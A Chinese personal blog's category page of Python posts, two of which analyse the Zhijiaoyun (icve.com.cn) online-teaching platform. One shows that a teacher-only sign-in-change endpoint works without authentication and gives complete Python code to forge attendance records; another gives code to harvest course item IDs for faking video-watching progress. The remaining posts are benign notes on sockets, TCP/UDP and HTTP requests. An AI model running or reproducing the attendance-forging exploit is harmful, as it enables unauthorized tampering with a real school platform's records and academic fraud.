分类 Python 下的文章 - Lan小站-嗯，不错！

2020-05-03

2020年05月03日
1,188 阅读
0 评论
0 点赞

2020-04-28

职教云-智慧职教，签到补签分析（逆天改命系列）最一开始，我只试着弄了个职教云签到监控。帮我签到，但是后来居然在一些地方看到各种逆天操作，然后发现全部都是教师权限才能的操作，然后我就对职教云补签进行了抓包分析（别问我教师账号怎么来的，注册即可）。在用教师账户进行补签操作之后抓到这么一个包，怎么抓包的就说了，这个也不是重点，主要看思路。这个包是我在职教云手机端抓到的，因为手机版比网页版更老实。先来看下他的参数：传递了一些cookiedata，equipmentAppVersion，equipmentModel，equipmentApiVersion经过目测翻译，加分析值：equipmentAppVersion：这玩意就是app版本号equipmentModel：这个是我手机型号equipmentApiVersion：这个大概估计就是api版本了吧。然后就是那个最关键的data了，一般来说要传递的值都在data里面吧。把它复制出来并且url解码之后是一串这样的为了看得更清楚，给他挪个地方看看咳咳，继续盲猜之旅。目前的值有这些：OpenClassId：这个似乎目测翻译一下就是，开放班级的IDId：这玩意就一个ID，是啥ID咱也不知道呀，放着看看SignId：目测翻译一下，标志ID，估计就是代表这条活动的ID吧StuId：目测翻译就是学生IDSignResultType：标志结果类型，咳咳人工机翻，估计意思就是签到的目标状态SourceType：来源类型？大概这样吧schoolId：目测翻译就是学校ID经过上面这一长短的目测翻译大概需要的一些值就是这样了。现在先试着发一个包看下结果是修改成功，说明可以自己伪造包然后修改签到状态但问题是，我们没有老师的账号就没有老师cookie呀，那怎么可以实现那些逆天操作呢，我试着把传递的cookie删除，然后看下结果然后发现居然也修改成功了，既然cookie都不要了，那我干脆把手机型号，版本型号这些也删除试试，然后只保留一个data，结果。。。。除了说职教云老实我还能说什么。到此我们就可以完成补签操作了。对于上面那几个参数不再次分析了，懒，直接上代码完整代码在GitHub：https://github.com/vastsa/ZhiJiaoYunQianDaofrom configparser import ConfigParser import requests config = ConfigParser() config.read('config.info') try: stuid = config['information']['userid'] except: import get_cookie def get_kecheng(time): data = { 'stuId': stuid, 'faceDate': time } url = 'https://zjyapp.icve.com.cn/newmobileapi/faceteach/getStuFaceTeachList' html = requests.post(url=url, data=data).json() datalist = html['dataList'] courses = len(datalist) courseId = [] courseNmae = [] classSection = [] openClassId = [] for i in range(courses): courseNmae.append(datalist[i]['courseName']) courseId.append(datalist[i]['Id']) classSection.append(datalist[i]['classSection']) openClassId.append(datalist[i]['openClassId']) if courses != 0: print(f'课表如下：') js = 0 for i in range(courses): print(f'【{js}】第{classSection[i]}课：{courseNmae[i]}') js += 1 js = input("请输入你要补签的课堂：") return { 'courseId': courseId[int(js)], 'openClassId': openClassId[int(js)], 'courses': courses } else: print("同学，你今天无课，好好休息！") def buqian(course): url = 'https://zjyapp.icve.com.cn/newmobileapi/faceteach/newGetStuFaceActivityList' data = { 'activityId': course['courseId'], 'stuId': stuid, 'classState': '2', 'openClassId': course['openClassId'] } html = requests.post(url=url, data=data).json()['dataList'] buqianname = [] buqianid = [] for j in range(len(html)): datatype = html[j]['DataType'] if datatype == "签到": buqianname.append(html[j]['Title']) buqianid.append(html[j]['Id']) for i in range(len(buqianid)): print(f'【{i}】{buqianname[i]}') # print(f'【{i}】{buqianid[i]}') target = int(input("请输入要逆天改命的序号：")) datas = f'{{"OpenClassId":"{course["openClassId"]}","Id":"{stuid}","SignId":"{buqianid[target]}","StuId":"{stuid}","SignResultType":1,"SourceType":2,"schoolId":"3-3sabgooohfboflpnx6bq"}}' xdata = { 'data': f'{datas}' } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'zjyapp.icve.com.cn', 'Connection': 'Keep-Alive', 'Accept-Encoding': 'gzip', 'User-Agent': 'okhttp/3.10.0', } bqurl = 'https://zjyapp.icve.com.cn/newmobileapi/faceteach/changeSignType' html = requests.post(url=bqurl, headers=headers, data=xdata).json() if html['code'] == 1: print(html['msg']) print("逆天改命成功，返回菜单") menu() else: print(html['msg']) print("逆天改命失败，请联系Lan") def menu(): print("【欢迎使用职教云补签助手】") print(" By:Lan") date = input("请输入需要补签的日期如(2020-4-17)：") course = get_kecheng(date) buqian(course) if __name__ == '__main__': menu()

2020年04月28日
8,196 阅读
9 评论
1 点赞

2020-04-27

职教云-智慧职教，网课观看分析（秒刷网课）先来张效果图：当打开课件之后，发现右侧或不断发送一个包StuProcessCellLog的包，初步估计这就是不断向服务器发送我们目前的观看情况的包点开之后翻到最下面，可以看到Form Data，经过自己之前补签的分析，可以猜到下面对应的值的信息，以及刷网课的思路CourseOpenID：这个课程ID可以直接在网址栏查看OpenClassID：这个课程班级ID一样的可以直接在网址栏看上面这两个值在同一个课程都是不变的CellID：这个就是下一步分析怎么来的了token：后来发现这个和Cookie里面的token是一样的，所以也可以不变下面是分析CellID的获取过程：1，首先是获取整个课件的大列表，也就是下图这一块打开之后按F12，打开工具，然后刷新网页可以看到，多了三个东西出来getProcessList，getStuStudyClassList，getTopicByModuleId一个个来看吧，从第一个开始getProcessList：他提交了两条数据，一个是课程id一个是课程班级id返回来一个list，全部展开之后就是我们的课件列表了返回来第一级目录，和他的ID然后是第二个getStuStudyClassList：这个是获取你账户下有哪些课程，在这里可以不用管第三个是getTopicByModuleId可以看到这个是二级目录的id，然后uptopicid这个应该是上传者的id（网易翻译猜的，在这里没啥用，不过修改作业时间那里需要这个id）到这里，目前的三个包已经分析完了，但是还是没有得到刷进度要的CellID，这三个包只翻出来二级目录，还差最后课件的ID就行了，那是因为我们还没有展开课件，所以没有加载，然后我们现在来点开二级目录查看一下查看一下Form Data：一个三个值，第一个courseOpenID：说过了的，第二个OpenClassID：说过的，第三个topicid：现在说topicid:fzpq初步估计就是就是之前传递过的值，经对比可以发现这个id等于我们获取到的二级目录ID。到这里就已经得到了最开始我们所需要的CellID了回过神看这个文件列表发现，职教云好实诚呀。。第一个getProcessList：获取列表第二个getStuStudyClassList：获取学生学习班级列表第三个TopicidByMouduleid：通过Moduleid获取Topicid第四个getCellByTopicId：通过Topicid获取CellID总上就可以快乐的为所欲为了最后附上批量获取课程CellID的python代码import random import time import requests def get_all(): url = 'https://zjyapp.icve.com.cn/newmobileapi/assistTeacher/getModuleListByClassId' data = { 'courseOpenId': 'courseOpenId', 'openClassId': 'courseOpenId', 'stuId': 'stuId', } html = requests.post(url=url, data=data).json() data = html['moduleList'] moduleIds = [] for i in data: print(i['moduleName'] + '已加载') moduleIds.append(i['moduleId']) return moduleIds def get_list(moduleId): url = 'https://zjy2.icve.com.cn/newmobileapi/assistTeacher/getTopicListByModuleId' moduleIds = [] for i in moduleId: data = { 'openClassId': 'openClassId', 'courseOpenId': 'courseOpenId', 'moduleId': f'{i}' } html = requests.post(url=url, data=data).json() data = html['topicList'] for j in data: moduleIds.append(j['topicId']) return moduleIds def get_cell(topicIds): url = 'https://zjy2.icve.com.cn/newmobileapi/assistTeacher/getCellListByTopicId' cellids = [] for k in topicIds: data = { 'openClassId': 'openClassId', 'courseOpenId': 'courseOpenId', 'topicId': k, 'stuId': 'stuId' } html = requests.post(url=url, data=data).json() data = html['cellList'] for i in data: if i['categoryName'] == '子节点': for j in i['cellChildNodeList']: cellids.append(j['cellId']) else: cellids.append(i['cellId']) return cellids

2020年04月27日
11,453 阅读
14 评论
3 点赞

2020-04-26

TCP与UDP TCP类似于打电话，使用该种方式进行网络通信时，需要建立专门的虚拟连接，然后进行可靠的数据传输，如果数据发送失败，则客户端会自动重发该数据。UDP类似于发送短信，使用该种方式进行通讯时，不需要建立专门的虚拟连接，传输不可靠，如果发送失败，则客户端无法获得重要的数据一般使用TCP方式进行数据传输，不重要则UDP用UDP发送数据，网络调试工具可以成功收到，但是使用网络调试工具发送数据，python那边毫无反应，当换成TCP协议后双发就可以进行通信了

2020年04月26日
1,087 阅读
0 评论
0 点赞

2020-04-26

学习网络编程的第一天：python网络编程之用TCP制作聊天工具学习网络编程的第一天，看着视频教程跟着做了一天聊天小工具效果图展示：客户端：服务器端：客户端python代码：from socket import * # 创建客户端套接字对象 client_socket = socket(AF_INET, SOCK_STREAM) # 调用connect方法与服务器建立连接 client_socket.connect(('192.168.31.175', 8989)) while True: # 客户端发送信息 msg = input('>') client_socket.send(msg.encode('utf-8')) # 客户端接收信息 recv_data = client_socket.recv(1024) print('对方说：', recv_data.decode('utf-8'))服务器端python代码：from socket import * # 创建服务器端套接字对象 server_socket = socket(AF_INET, SOCK_STREAM) # 绑定端口 server_socket.bind(('', 8989)) # 监听 server_socket.listen() # 等待客户端连接 client_socket, client_info = server_socket.accept() while True: # 接受客户端信息 recv_data = client_socket.recv(1024) print('对方说：', recv_data.decode('utf-8')) # 发送信息 msg = input() client_socket.send(msg.encode('utf-8'))

2020年04月26日
986 阅读
0 评论
0 点赞

2020-04-26

Pycharm链接数据库出现 Server returns invalid timezone. Go to "Advanced" tab and set "serverTimezone" prope 在最终url 上追加 ?serverTimezone=GMT

2020年04月26日
2,488 阅读
0 评论
0 点赞

2020-04-25

python爬虫request如何提交request payload形式发送post请求今天想用python自动获取表单的信息，但是提交请求是request payload的形式和以往的data似乎有点不一样，用以往的方式提交发现错误了。最终解决方式如下：用json的dumps加载dataheaders = { 'content-type': 'application/json; charset=UTF-8', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36', } html = requests.post(url=url, headers=headers, data=json.dumps(data)).text--------------------------------------------------------------2020/5/19这两天又找到一个类似的也是payload的形式传递。然后发现直接当成字符串传递过去就好了

2020年04月25日
1,944 阅读
0 评论
0 点赞